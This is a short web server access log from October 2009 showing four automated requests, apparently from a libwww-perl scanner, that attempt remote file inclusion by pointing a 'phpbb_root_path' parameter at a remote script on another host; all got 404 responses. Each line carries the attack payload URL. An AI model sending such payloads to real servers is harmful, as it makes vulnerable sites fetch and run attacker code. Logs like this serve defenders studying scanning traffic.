74.205.54.26 - - [30/Oct/2009:09:23:29 -0700] "GET /logs/access_080515.log//link_main.php?phpbb_root_path=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.205.54.26 - - [30/Oct/2009:09:23:29 -0700] "GET /link_main.php?phpbb_root_path=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.205.54.26 - - [30/Oct/2009:09:23:29 -0700] "GET /link_main.php?phpbb_root_path=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.205.54.26 - - [30/Oct/2009:09:23:29 -0700] "GET /link_main.php?phpbb_root_path=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
